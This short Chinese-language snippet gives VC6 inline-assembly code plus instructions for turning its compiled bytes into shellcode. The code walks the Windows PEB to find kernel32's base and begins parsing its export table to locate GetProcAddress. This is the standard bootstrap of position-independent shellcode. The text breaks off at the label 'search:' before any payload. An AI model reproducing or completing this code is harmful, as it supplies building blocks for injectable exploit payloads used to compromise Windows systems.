此代码可在 VC6 下直接编译；提取 shellcode 时在 Debug 模式下运行，打开内存窗口，复制出二进制代码，整理成 shellcode 即可。
本代码修改自以下原文，原文地址：http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5
int main()
{
__asm{
nop;
nop;
nop;
nop;
nop;
nop;
nop;
push ebp;
mov esi,fs:0x30; //PEB
mov esi, [esi + 0x0C]; //+0x00c Ldr : Ptr32 _PEB_LDR_DATA
mov esi, [esi + 0x1C]; //+0x01c InInitializationOrderModuleList : _LIST_ENTRY
next_module:
mov ebp, [esi + 0x08];
mov edi, [esi + 0x20];
mov esi, [esi];
cmp [edi + 12*2],cl;
jne next_module;
mov edi,ebp;
//寻找GetProcAddress地址
sub esp,100;
mov ebp,esp;
mov eax,[edi+3ch];//PE头
mov edx,[edi+eax+78h]
add edx,edi;
mov ecx,[edx+18h];//函数数量
mov ebx,[edx+20h];
add ebx,edi;
search: